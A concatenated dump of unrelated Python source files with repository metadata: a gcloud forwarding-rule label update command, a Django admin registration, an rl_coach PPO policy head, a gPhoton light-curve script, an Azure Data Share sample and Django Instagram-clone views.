  """Register the forwarding-rule positional arg and label flags on *parser*.

  Stores the resource argument on *cls* so Run() can resolve it later.
  """
  cls.FORWARDING_RULE_ARG = flags.ForwardingRuleArgument()
  cls.FORWARDING_RULE_ARG.AddArgument(parser)
  labels_util.AddUpdateLabelsFlags(parser)
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class Update(base.UpdateCommand):
  r"""Update a Google Compute Engine forwarding rule.

  *{command}* updates labels for a Google Compute Engine
  forwarding rule. For example:

    $ {command} example-fr --region us-central1 \
        --update-labels=k0=value1,k1=value2 --remove-labels=k3

  will add/update labels ``k0'' and ``k1'' and remove labels with key ``k3''.

  Labels can be used to identify the forwarding rule and to filter them as in

    $ {parent_command} list --filter='labels.k1:value2'

  To list existing labels

    $ {parent_command} describe example-fr --format='default(labels)'
  """

  # Populated by Args() via the shared _Args() helper.
  FORWARDING_RULE_ARG = None

  @classmethod
  def Args(cls, parser):
    _Args(cls, parser)

  def _CreateGlobalSetLabelsRequest(self, messages, forwarding_rule_ref,
                                    forwarding_rule, replacement):
    """Builds a SetLabels request for a *global* forwarding rule."""
    return messages.ComputeGlobalForwardingRulesSetLabelsRequest(
        project=forwarding_rule_ref.project,
        resource=forwarding_rule_ref.Name(),
        globalSetLabelsRequest=messages.GlobalSetLabelsRequest(
            labelFingerprint=forwarding_rule.labelFingerprint,
            labels=replacement))

  def _CreateRegionalSetLabelsRequest(self, messages, forwarding_rule_ref,
                                      forwarding_rule, replacement):
    """Builds a SetLabels request for a *regional* forwarding rule."""
    return messages.ComputeForwardingRulesSetLabelsRequest(
        project=forwarding_rule_ref.project,
        resource=forwarding_rule_ref.Name(),
        region=forwarding_rule_ref.region,
        regionSetLabelsRequest=messages.RegionSetLabelsRequest(
            labelFingerprint=forwarding_rule.labelFingerprint,
            labels=replacement))

  def Run(self, args):
    """Fetches the rule, diffs the labels and applies them, waiting on the op."""
    holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
    client = holder.client.apitools_client
    messages = holder.client.messages

    forwarding_rule_ref = self.FORWARDING_RULE_ARG.ResolveAsResource(
        args,
        holder.resources,
        scope_lister=compute_flags.GetDefaultScopeLister(holder.client))

    labels_diff = labels_util.Diff.FromUpdateArgs(args)
    if not labels_diff.MayHaveUpdates():
      raise calliope_exceptions.RequiredArgumentException(
          'LABELS', 'At least one of --update-labels or '
          '--remove-labels must be specified.')

    # Global and regional rules use different request/label message types.
    if forwarding_rule_ref.Collection() == 'compute.globalForwardingRules':
      forwarding_rule = client.globalForwardingRules.Get(
          messages.ComputeGlobalForwardingRulesGetRequest(
              **forwarding_rule_ref.AsDict()))
      labels_value = messages.GlobalSetLabelsRequest.LabelsValue
    else:
      forwarding_rule = client.forwardingRules.Get(
          messages.ComputeForwardingRulesGetRequest(
              **forwarding_rule_ref.AsDict()))
      labels_value = messages.RegionSetLabelsRequest.LabelsValue

    labels_update = labels_diff.Apply(labels_value, forwarding_rule.labels)

    # No-op diff: return the existing rule without issuing a request.
    if not labels_update.needs_update:
      return forwarding_rule

    if forwarding_rule_ref.Collection() == 'compute.globalForwardingRules':
      request = self._CreateGlobalSetLabelsRequest(
          messages, forwarding_rule_ref, forwarding_rule, labels_update.labels)
      operation = client.globalForwardingRules.SetLabels(request)
      operation_ref = holder.resources.Parse(
          operation.selfLink, collection='compute.globalOperations')
      operation_poller = poller.Poller(client.globalForwardingRules)
    else:
      request = self._CreateRegionalSetLabelsRequest(
          messages, forwarding_rule_ref, forwarding_rule, labels_update.labels)
      operation = client.forwardingRules.SetLabels(request)
      operation_ref = holder.resources.Parse(
          operation.selfLink, collection='compute.regionOperations')
      operation_poller = poller.Poller(client.forwardingRules)

    # Block until the SetLabels operation completes, then return the result.
    return waiter.WaitFor(operation_poller, operation_ref,
                          'Updating labels of forwarding rule [{0}]'.format(
                              forwarding_rule_ref.Name()))
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class UpdateAlpha(Update):
  r"""Update a Google Compute Engine forwarding rule.

  *{command}* updates labels and network tier for a Google Compute Engine
  forwarding rule.

  Example to update labels:

    $ {command} example-fr --region us-central1 \
        --update-labels=k0=value1,k1=value2 --remove-labels=k3

  will add/update labels ``k0'' and ``k1'' and remove labels with key ``k3''.

  Labels can be used to identify the forwarding rule and to filter them as in

    $ {parent_command} list --filter='labels.k1:value2'

  To list existing labels

    $ {parent_command} describe example-fr --format='default(labels)'
  """

  @classmethod
  def Args(cls, parser):
    _Args(cls, parser)
    flags.AddNetworkTier(parser, include_alpha=True, for_update=True)

  def ConstructNetworkTier(self, messages, network_tier):
    """Maps a --network-tier string to its enum value, or None when unset.

    Raises InvalidArgumentException for an unknown tier name.
    """
    if network_tier:
      network_tier = network_tier.upper()
      if network_tier in constants.NETWORK_TIER_CHOICES_FOR_INSTANCE:
        return messages.ForwardingRule.NetworkTierValueValuesEnum(network_tier)
      else:
        raise calliope_exceptions.InvalidArgumentException(
            '--network-tier',
            'Invalid network tier [{tier}]'.format(tier=network_tier))
    else:
      return

  def Modify(self, messages, args, existing):
    """Returns a modified forwarding rule message and included fields."""
    if args.network_tier is None:
      return None
    else:
      return messages.ForwardingRule(
          name=existing.name,
          networkTier=self.ConstructNetworkTier(messages, args.network_tier))

  def Run(self, args):
    """Returns a list of requests necessary for updating forwarding rules."""
    holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
    client = holder.client.apitools_client
    messages = holder.client.messages

    forwarding_rule_ref = self.FORWARDING_RULE_ARG.ResolveAsResource(
        args,
        holder.resources,
        scope_lister=compute_flags.GetDefaultScopeLister(holder.client))

    labels_diff = labels_util.Diff.FromUpdateArgs(args)
    if not labels_diff.MayHaveUpdates() and args.network_tier is None:
      raise calliope_exceptions.ToolException(
          'At least one property must be specified.')

    # Get replacement.
    if forwarding_rule_ref.Collection() == 'compute.globalForwardingRules':
      get_request = (client.globalForwardingRules, 'Get',
                     messages.ComputeGlobalForwardingRulesGetRequest(
                         forwardingRule=forwarding_rule_ref.Name(),
                         project=forwarding_rule_ref.project))
      labels_value = messages.GlobalSetLabelsRequest.LabelsValue
    else:
      get_request = (client.forwardingRules, 'Get',
                     messages.ComputeForwardingRulesGetRequest(
                         forwardingRule=forwarding_rule_ref.Name(),
                         project=forwarding_rule_ref.project,
                         region=forwarding_rule_ref.region))
      labels_value = messages.RegionSetLabelsRequest.LabelsValue

    objects = holder.client.MakeRequests([get_request])
    forwarding_rule = objects[0]

    # Network-tier patch (None when --network-tier was not given) and
    # label diff are computed independently; each may add its own request.
    forwarding_rule_replacement = self.Modify(messages, args, forwarding_rule)
    label_update = labels_diff.Apply(labels_value, forwarding_rule.labels)

    # Create requests.
    requests = []
    if forwarding_rule_ref.Collection() == 'compute.globalForwardingRules':
      if forwarding_rule_replacement:
        request = messages.ComputeGlobalForwardingRulesPatchRequest(
            forwardingRule=forwarding_rule_ref.Name(),
            forwardingRuleResource=forwarding_rule_replacement,
            project=forwarding_rule_ref.project)
        requests.append((client.globalForwardingRules, 'Patch', request))
      if label_update.needs_update:
        request = self._CreateGlobalSetLabelsRequest(
            messages, forwarding_rule_ref, forwarding_rule, label_update.labels)
        requests.append((client.globalForwardingRules, 'SetLabels', request))
    else:
      if forwarding_rule_replacement:
        request = messages.ComputeForwardingRulesPatchRequest(
            forwardingRule=forwarding_rule_ref.Name(),
            forwardingRuleResource=forwarding_rule_replacement,
            project=forwarding_rule_ref.project,
            region=forwarding_rule_ref.region)
        requests.append((client.forwardingRules, 'Patch', request))
      if label_update.needs_update:
        request = self._CreateRegionalSetLabelsRequest(
            messages, forwarding_rule_ref, forwarding_rule, label_update.labels)
        requests.append((client.forwardingRules, 'SetLabels', request))

    return holder.client.MakeRequests(requests)
| [
"jordan.robison@gmail.com"
] | jordan.robison@gmail.com |
ab618756d18481095af581ec2784df2054af7044 | 5abdbe26ad89d50761e505d02c35ea184d79f712 | /learning_logs/admin.py | a1d4a285a35b36f507aeeeb683fe621de3031bd8 | [] | no_license | liyongjun-brayan/xuexi | 5c00abaeadb46caa4a63fdcd316fabd2d1ebdb15 | b5356a5115b34dc1d5f627215aef780d7d5a0693 | refs/heads/master | 2021-06-25T10:25:12.602434 | 2019-08-27T02:27:23 | 2019-08-27T02:27:23 | 204,632,981 | 1 | 0 | null | 2021-06-10T21:54:15 | 2019-08-27T06:16:39 | Python | UTF-8 | Python | false | false | 167 | py | from django.contrib import admin
# Register your models here.
from learning_logs.models import Topic, Entry
# Expose the learning-log models in the Django admin site.
admin.site.register(Topic)
admin.site.register(Entry)
| [
"johndoe@example.com"
] | johndoe@example.com |
409be856f4a7e354eaeef1155234db833b8c60d9 | efe036849aa46755d5dcc86dbdb682b750a318eb | /rl_coach/architectures/tensorflow_components/heads/ppo_head.py | 755ffa656b0bb7ced7c2efda502d88e03389f0c4 | [
"Apache-2.0"
] | permissive | danialkamran/coach | a1284b54f8cd59b9e7e1f49e55a31484fffd89cd | a4471389a429793fd871b225d3aaccbcf4c676ec | refs/heads/master | 2020-03-26T22:01:54.656300 | 2018-08-20T10:50:09 | 2018-08-20T10:50:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,153 | py | #
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import tensorflow as tf
from rl_coach.base_parameters import AgentParameters
from rl_coach.spaces import BoxActionSpace, DiscreteActionSpace
from rl_coach.spaces import SpacesDefinition
from rl_coach.utils import eps
from rl_coach.architectures.tensorflow_components.heads.head import Head, HeadParameters, normalized_columns_initializer
from rl_coach.core_types import ActionProbabilities
class PPOHeadParameters(HeadParameters):
    """Configuration bundle used by the framework to instantiate a PPOHead."""
    def __init__(self, activation_function: str ='tanh', name: str='ppo_head_params'):
        super().__init__(parameterized_class=PPOHead, activation_function=activation_function, name=name)
class PPOHead(Head):
    """Policy head implementing the PPO objective (TF1 graph construction).

    Builds a categorical policy for discrete action spaces or a diagonal
    Gaussian policy for box action spaces, then defines the clipped-surrogate
    loss, with optional KL-divergence and entropy regularization.
    """
    def __init__(self, agent_parameters: AgentParameters, spaces: SpacesDefinition, network_name: str,
                 head_idx: int = 0, loss_weight: float = 1., is_local: bool = True, activation_function: str='tanh'):
        super().__init__(agent_parameters, spaces, network_name, head_idx, loss_weight, is_local, activation_function)
        self.name = 'ppo_head'
        self.return_type = ActionProbabilities

        # used in regular PPO
        self.use_kl_regularization = agent_parameters.algorithm.use_kl_regularization
        if self.use_kl_regularization:
            # kl coefficient and its corresponding assignment operation and placeholder
            # (the agent adapts the coefficient at runtime through the placeholder).
            self.kl_coefficient = tf.Variable(agent_parameters.algorithm.initial_kl_coefficient,
                                              trainable=False, name='kl_coefficient')
            self.kl_coefficient_ph = tf.placeholder('float', name='kl_coefficient_ph')
            self.assign_kl_coefficient = tf.assign(self.kl_coefficient, self.kl_coefficient_ph)
            self.kl_cutoff = 2 * agent_parameters.algorithm.target_kl_divergence
            self.high_kl_penalty_coefficient = agent_parameters.algorithm.high_kl_penalty_coefficient

        self.clip_likelihood_ratio_using_epsilon = agent_parameters.algorithm.clip_likelihood_ratio_using_epsilon
        self.beta = agent_parameters.algorithm.beta_entropy

    def _build_module(self, input_layer):
        # Build the policy network and distributions for the current action
        # space, then assemble the PPO surrogate loss on top of them.
        if isinstance(self.spaces.action, DiscreteActionSpace):
            self._build_discrete_net(input_layer, self.spaces.action)
        elif isinstance(self.spaces.action, BoxActionSpace):
            self._build_continuous_net(input_layer, self.spaces.action)
        else:
            raise ValueError("only discrete or continuous action spaces are supported for PPO")

        self.action_probs_wrt_policy = self.policy_distribution.log_prob(self.actions)
        self.action_probs_wrt_old_policy = self.old_policy_distribution.log_prob(self.actions)
        self.entropy = tf.reduce_mean(self.policy_distribution.entropy())

        # Used by regular PPO only
        # add kl divergence regularization
        self.kl_divergence = tf.reduce_mean(tf.distributions.kl_divergence(self.old_policy_distribution, self.policy_distribution))
        if self.use_kl_regularization:
            # no clipping => use kl regularization
            self.weighted_kl_divergence = tf.multiply(self.kl_coefficient, self.kl_divergence)
            # Extra quadratic penalty kicks in once KL exceeds the cutoff.
            self.regularizations = self.weighted_kl_divergence + self.high_kl_penalty_coefficient * \
                tf.square(tf.maximum(0.0, self.kl_divergence - self.kl_cutoff))
            tf.add_to_collection(tf.GraphKeys.REGULARIZATION_LOSSES, self.regularizations)

        # calculate surrogate loss
        self.advantages = tf.placeholder(tf.float32, [None], name="advantages")
        self.target = self.advantages
        # action_probs_wrt_old_policy != 0 because it is e^...
        self.likelihood_ratio = tf.exp(self.action_probs_wrt_policy - self.action_probs_wrt_old_policy)
        if self.clip_likelihood_ratio_using_epsilon is not None:
            # clip_param_rescaler lets the agent anneal the clip range over time.
            self.clip_param_rescaler = tf.placeholder(tf.float32, ())
            self.input.append(self.clip_param_rescaler)
            max_value = 1 + self.clip_likelihood_ratio_using_epsilon * self.clip_param_rescaler
            min_value = 1 - self.clip_likelihood_ratio_using_epsilon * self.clip_param_rescaler
            self.clipped_likelihood_ratio = tf.clip_by_value(self.likelihood_ratio, min_value, max_value)
            self.scaled_advantages = tf.minimum(self.likelihood_ratio * self.advantages,
                                                self.clipped_likelihood_ratio * self.advantages)
        else:
            self.scaled_advantages = self.likelihood_ratio * self.advantages
        # minus sign is in order to set an objective to minimize (we actually strive for maximizing the surrogate loss)
        self.surrogate_loss = -tf.reduce_mean(self.scaled_advantages)
        if self.is_local:
            # add entropy regularization
            if self.beta:
                self.entropy = tf.reduce_mean(self.policy_distribution.entropy())
                self.regularizations = -tf.multiply(self.beta, self.entropy, name='entropy_regularization')
                tf.add_to_collection(tf.GraphKeys.REGULARIZATION_LOSSES, self.regularizations)
            self.loss = self.surrogate_loss
            tf.losses.add_loss(self.loss)

    def _build_discrete_net(self, input_layer, action_space):
        # Categorical policy over a discrete action space.
        num_actions = len(action_space.actions)
        self.actions = tf.placeholder(tf.int32, [None], name="actions")

        self.old_policy_mean = tf.placeholder(tf.float32, [None, num_actions], "old_policy_mean")
        self.old_policy_std = tf.placeholder(tf.float32, [None, num_actions], "old_policy_std")

        # Policy Head
        self.input = [self.actions, self.old_policy_mean]
        policy_values = tf.layers.dense(input_layer, num_actions, name='policy_fc')
        self.policy_mean = tf.nn.softmax(policy_values, name="policy")

        # define the distributions for the policy and the old policy
        self.policy_distribution = tf.contrib.distributions.Categorical(probs=self.policy_mean)
        self.old_policy_distribution = tf.contrib.distributions.Categorical(probs=self.old_policy_mean)

        self.output = self.policy_mean

    def _build_continuous_net(self, input_layer, action_space):
        # Diagonal-Gaussian policy over a continuous (box) action space; the
        # mean comes from a dense layer, log-std is a free (state-independent)
        # variable tiled across the batch.
        num_actions = action_space.shape[0]
        self.actions = tf.placeholder(tf.float32, [None, num_actions], name="actions")

        self.old_policy_mean = tf.placeholder(tf.float32, [None, num_actions], "old_policy_mean")
        self.old_policy_std = tf.placeholder(tf.float32, [None, num_actions], "old_policy_std")

        self.input = [self.actions, self.old_policy_mean, self.old_policy_std]
        self.policy_mean = tf.layers.dense(input_layer, num_actions, name='policy_mean',
                                           kernel_initializer=normalized_columns_initializer(0.01))
        if self.is_local:
            self.policy_logstd = tf.Variable(np.zeros((1, num_actions)), dtype='float32',
                                             collections=[tf.GraphKeys.LOCAL_VARIABLES])
        else:
            self.policy_logstd = tf.Variable(np.zeros((1, num_actions)), dtype='float32')
        self.policy_std = tf.tile(tf.exp(self.policy_logstd), [tf.shape(input_layer)[0], 1], name='policy_std')

        # define the distributions for the policy and the old policy
        # (eps keeps the std strictly positive).
        self.policy_distribution = tf.contrib.distributions.MultivariateNormalDiag(self.policy_mean, self.policy_std + eps)
        self.old_policy_distribution = tf.contrib.distributions.MultivariateNormalDiag(self.old_policy_mean, self.old_policy_std + eps)

        self.output = [self.policy_mean, self.policy_std]
| [
"gal.novik@intel.com"
] | gal.novik@intel.com |
60880b307495d767154fe596f68b0a05c24e4934 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/he_0532-4503/sdB_HE_0532-4503_lc.py | 5fe4f20f7122fe6399d904e826635f483dd2d08c | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 347 | py | from gPhoton.gAperture import gAperture
def main():
    """Generate a NUV light curve for sdB_HE_0532-4503 with gPhoton's gAperture."""
    # NOTE(review): the csvfile path contains a space before the final '/';
    # verify this matches the actual directory name on disk before running.
    gAperture(band="NUV", skypos=[83.41875,-45.026469], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_HE_0532-4503 /sdB_HE_0532-4503_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)

if __name__ == "__main__":
    main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
4ce1e2145bd1edf9bd044808195879cc321dd342 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/datashare/azure-mgmt-datashare/generated_samples/email_registrations_register_email.py | bdce504aee2c308cacde889689874a6961ecd619 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,540 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.datashare import DataShareManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datashare
# USAGE
python email_registrations_register_email.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Authenticate via DefaultAzureCredential, call the register-email
    operation on the Data Share management client, and print the response."""
    credential = DefaultAzureCredential()
    client = DataShareManagementClient(
        credential=credential,
        subscription_id="SUBSCRIPTION_ID",
    )
    registration = client.email_registrations.register_email(location="East US 2")
    print(registration)


# x-ms-original-file: specification/datashare/resource-manager/Microsoft.DataShare/stable/2020-09-01/examples/EmailRegistrations_RegisterEmail.json
if __name__ == "__main__":
    main()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
a76680334402715f6493dcd8c93f9120713d231b | 25fa5fdc9f67738332bd6f95a1e4f038cd286890 | /이것이 코딩테스트다/ch05_DFS:BFS/음료수 얼려 먹기.py | d8e484185f873f9fe701d264e79b7d3577dd241e | [] | no_license | mandos1995/online_judge | b0cfd56e3391495f22b9832895cddcea70334349 | 9b90bffdcbfb5369e8dd5dafbb07f8e9e7050617 | refs/heads/main | 2023-08-02T19:29:03.716295 | 2021-10-04T15:10:34 | 2021-10-04T15:10:34 | 329,517,747 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | py | # n, m을 공백으로 구분하여 입력받기
n, m = map(int, input().split())
# 2차원 리스트의 맵 정보 입력받기
graph = []
for i in range(n):
graph.append(list(map(int, input())))
# Flood-fill: visit a cell and every connected cell via DFS.
def dfs(x, y, grid=None, rows=None, cols=None):
    """Flood-fill the region of 0-cells containing (x, y), marking them 1.

    Returns True when (x, y) starts a new, previously unfilled region;
    False when it is out of bounds or already filled/blocked.

    grid/rows/cols default to the module-level graph/n/m so existing
    callers keep working; passing them explicitly makes the function
    reusable and testable.
    """
    if grid is None:
        grid = graph
    if rows is None:
        rows = n
    if cols is None:
        cols = m
    # Out-of-range or non-empty starting cell: nothing to fill.
    if x <= -1 or x >= rows or y <= -1 or y >= cols or grid[x][y] != 0:
        return False
    # Iterative DFS with an explicit stack instead of recursion, so large
    # grids cannot overflow Python's default recursion limit.
    grid[x][y] = 1
    stack = [(x, y)]
    while stack:
        cx, cy = stack.pop()
        # Visit up, left, down, right neighbours.
        for nx, ny in ((cx - 1, cy), (cx, cy - 1), (cx + 1, cy), (cx, cy + 1)):
            if 0 <= nx < rows and 0 <= ny < cols and grid[nx][ny] == 0:
                grid[nx][ny] = 1
                stack.append((nx, ny))
    return True
# Count connected regions of 0-cells: dfs() returns True exactly when it
# starts filling a previously unvisited region.
result = 0
for i in range(n):
    for j in range(m):
        # Run DFS from the current position.
        if dfs(i, j) == True:
            result += 1
# Print the number of fillable regions.
print(result)
"mandos19950620@gmail.com"
] | mandos19950620@gmail.com |
5ad81796a5241330f88f92f45f79a5872d510001 | e944d288093c9234c3a6a2a76ffe4e3c9b236cf1 | /build/lib/annotation_utils/labelme/structs/__init__.py | aaa1bbe76f1ee7e19833c84476e97f5d662ef39a | [
"MIT"
] | permissive | darwinharianto/annotation_utils | 598b043345790580e99f34f159b9612b9b1bcd52 | 1cbdadaa28ff945e705dd7b806dda395e32ab23c | refs/heads/master | 2022-04-27T01:20:10.738778 | 2020-04-27T09:23:57 | 2020-04-27T09:23:57 | 255,525,300 | 0 | 0 | MIT | 2020-04-27T09:23:59 | 2020-04-14T06:10:57 | Python | UTF-8 | Python | false | false | 101 | py | from .ann import LabelmeShape, LabelmeShapeHandler, LabelmeAnnotation, \
LabelmeAnnotationHandler | [
"mork.clayton3@gmail.com"
] | mork.clayton3@gmail.com |
1c146007bdbbf771119232ee15090e4223ebdda3 | de40d3fa8d8af0030556d27d6833f6a1a0e7700c | /baekjoon/10409py/a.py | 496a9142bc65445a4c3f00ba64a3aab3aec0e196 | [] | no_license | NeoMindStd/CodingLife | cd6a627209c0353f4855f09fd5dfef8da4bbfef6 | bcb6c3752f472e6a4f3b8f158d02bc3599dfcda3 | refs/heads/master | 2022-12-24T10:42:45.390085 | 2022-12-11T16:27:16 | 2022-12-11T16:27:16 | 191,797,634 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | n,T=map(int,input().split())
l=list(map(int,input().split()))
s=i=0
while i<n:
s+=l[i]
if s>T:break
i+=1
print(i)
| [
"dwj1996@naver.com"
] | dwj1996@naver.com |
f1e3f05aa54d6e7d9bf3c2192cdfe8839adb3607 | e2f0587c7949d71bf432d31b2460d4bd2a200961 | /MixedDjango/clonecodding/instagram/views.py | 43a3e63a00cb8c10e6365cd8a5a203fc7b9e3825 | [] | no_license | NGG-kang/DjangoReview | 91c92dbf0d8da6a4179844cf788ca8c731434860 | c6338dfa643d73dbfb4fcdafe53a7997ca253f3a | refs/heads/main | 2023-04-21T06:32:28.109349 | 2021-05-23T09:41:44 | 2021-05-23T09:41:44 | 342,759,741 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,155 | py | import json
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.db.models import Q
from django.http import HttpResponse
from django.shortcuts import render, get_object_or_404, redirect, resolve_url
from django.views.generic import ListView, UpdateView, CreateView, DetailView, DeleteView
from django.contrib import messages
from rest_framework.filters import SearchFilter, OrderingFilter
from rest_framework.renderers import TemplateHTMLRenderer
from .models import Post, Comment
from .forms import PostForm, CommentForm
from django.urls import reverse, reverse_lazy
from django.contrib.auth import get_user_model
# 함수기반
# def post_list(request):
# post_list = Post.objects.filter(author=request.user)
#
#
# return render(request, 'instagram/post_list.html', {
# 'post_list': post_list
# })
#
# def post_create(request):
# form = PostForm(request.POST, request.FILES)
# pass
#
# def post_modify(request, pk):
# pass
#
# def post_delete(request, pk):
# pass
class PostListView(ListView):
    """Paginated feed of posts by the logged-in user and the users they follow.

    Anonymous visitors get an empty feed (post_list=None).
    """
    # def get_queryset(self):
        # paginate_by works because the paginator is applied after get_queryset
        # if not self.request.user.is_anonymous:
        #     self.queryset = Post.objects.filter(author=self.request.user)
        # if not self.queryset:
        #     self.queryset = None
        # return self.queryset

    def get(self, request, *args, **kwargs):
        if not request.user.is_anonymous:
            # Posts authored by followed users or by the requester.
            qs = Post.objects.all() \
                .filter(
                    Q(author__in=request.user.following_set.all()) |
                    Q(author=request.user)
                )
            if qs:
                # Paginate manually (9 posts per page) since we bypass
                # ListView's normal get_queryset flow.
                paginator, page, queryset, is_paginated = super().paginate_queryset(qs, 9)
                context = {
                    'paginator': paginator,
                    'page': page,
                    'is_paginated': is_paginated,
                    'post_list': queryset,
                }
                return render(request, 'instagram/post_list.html', context)
        # Anonymous user or empty feed.
        return render(request, 'instagram/post_list.html', {
            'post_list': None
        })
class PostCreateView(LoginRequiredMixin, CreateView):
    """Create a new Post owned by the logged-in user."""
    model = Post
    form_class = PostForm

    def form_valid(self, form):
        # Attach the author before the parent saves and redirects.
        self.object = form.save(commit=False)
        self.object.author = self.request.user
        messages.success(self.request, '포스팅 저장 완료')
        return super().form_valid(form)
class PostUpdateView(LoginRequiredMixin, UpdateView):
    """Edit an existing Post; only its author may change it."""
    model = Post
    form_class = PostForm

    def get(self, request, *args, **kwargs):
        # Block non-authors before rendering the edit form.
        self.object = get_object_or_404(Post, pk=kwargs['pk'])
        if self.object.author != request.user:
            messages.warning(self.request, '작성한 회원만 수정할 수 있습니다')
            return redirect(self.object)
        # BUG FIX: the parent's get() expects (request, *args, **kwargs);
        # previously a form class was passed in place of the request object.
        return super().get(request, *args, **kwargs)

    def form_valid(self, form):
        # BUG FIX: previously super().form_valid(form) ran (and saved the
        # form) even when the requester was not the author, and authors had
        # the form saved twice. Reject non-authors without saving.
        if form.instance.author != self.request.user:
            messages.warning(self.request, '작성한 회원만 수정할 수 있습니다')
            return redirect(form.instance)
        messages.success(self.request, '포스팅 수정 완료')
        # The parent saves the form exactly once and redirects.
        return super().form_valid(form)
class PostDeleteView(LoginRequiredMixin, DeleteView):
    """Delete a Post after confirmation; only its author may delete it."""
    model = Post
    template_name_suffix = '_delete'
    # BUG FIX: success_url must be a URL, not a template path. It is unused
    # while post() is overridden below, but kept correct for safety.
    success_url = reverse_lazy('instagram:post_list')

    def get(self, request, *args, **kwargs):
        # Show the confirmation page, but only to the post's author.
        self.object = get_object_or_404(Post, pk=kwargs['pk'])
        if self.object.author != request.user:
            messages.warning(self.request, '작성한 회원만 삭제할수 있습니다')
            return redirect(self.object)
        # BUG FIX: the parent's get() expects (request, *args, **kwargs);
        # previously the Post model class was passed as the request object.
        return super().get(request, *args, **kwargs)

    def post(self, request, *args, **kwargs):
        # Perform the deletion, again guarding against non-authors.
        self.object = get_object_or_404(Post, pk=kwargs['pk'])
        if self.object.author != request.user:
            messages.warning(self.request, '작성한 회원만 삭제할수 있습니다')
            return redirect(self.object)
        self.object.delete()
        messages.success(request, '포스팅 삭제 완료')
        return redirect('instagram:post_list')
class PostDetailView(DetailView):
model = Post
def get_context_data(self, **kwargs):
comment_list = Comment.objects.filter(post=kwargs.get('object'))
comment_form = CommentForm()
context = {
'comment_list': comment_list,
'form': comment_form
}
return super().get_context_data(**context)
def post(self, request, **kwargs):
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.author = request.user
comment.post = super().get_object()
comment.save()
return redirect('instagram:post_detail', pk=kwargs.get('pk'))
def get(self, request, *args, **kwargs):
pk = request.GET.get('pk', '')
if pk:
comment = Comment.objects.get(pk=pk)
if comment.author != request.user:
messages.warning(request, message="작성자가 아닙니다")
return
self.object = self.get_object()
initial_dict = {
"comment": comment.comment,
"author": comment.author,
"post": comment.post,
}
form = CommentForm(request.POST or None, initial=initial_dict)
self.object = self.get_object()
context = self.get_context_data(object=self.object)
context["comment_edit_form"] = form
context["comment_pk"] = comment.pk
return self.render_to_response(context)
# return render(request, "instagram/form.html", {
# "comment_edit_form": comment_edit_form,
# "comment_message": comment.comment
# })
else:
self.object = self.get_object()
context = self.get_context_data(object=self.object)
return self.render_to_response(context)
def post_detail(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == 'POST':
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.author = request.user
comment.post = post
comment.save()
return redirect('instagram:post_detail', pk=pk)
else:
comment_list = Comment.objects.filter(post=pk)
comment_form = CommentForm()
return render(request, 'instagram/post_detail.html', {
'post': post,
'form': comment_form,
'comment_list': comment_list,
})
def post_like(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.user==post.author:
messages.warning(request, "작성한 회원은 좋아요를 누를수 없습니다")
return redirect('instagram:post_detail', pk=pk)
post.like_user.add(request.user)
messages.success(request, f"{post.author} 좋아요")
redirect_url = request.META.get("HTTP_REFERER", "root")
return redirect(redirect_url)
def post_unlike(request, pk):
post = get_object_or_404(Post, pk=pk)
post.like_user.remove(request.user)
messages.success(request, f"{post.author} 좋아요 취소")
redirect_url = request.META.get("HTTP_REFERER", "root")
return redirect(redirect_url)
def comment_delete(request, pk, comment_pk):
comment = get_object_or_404(Comment, pk=comment_pk)
comment.delete()
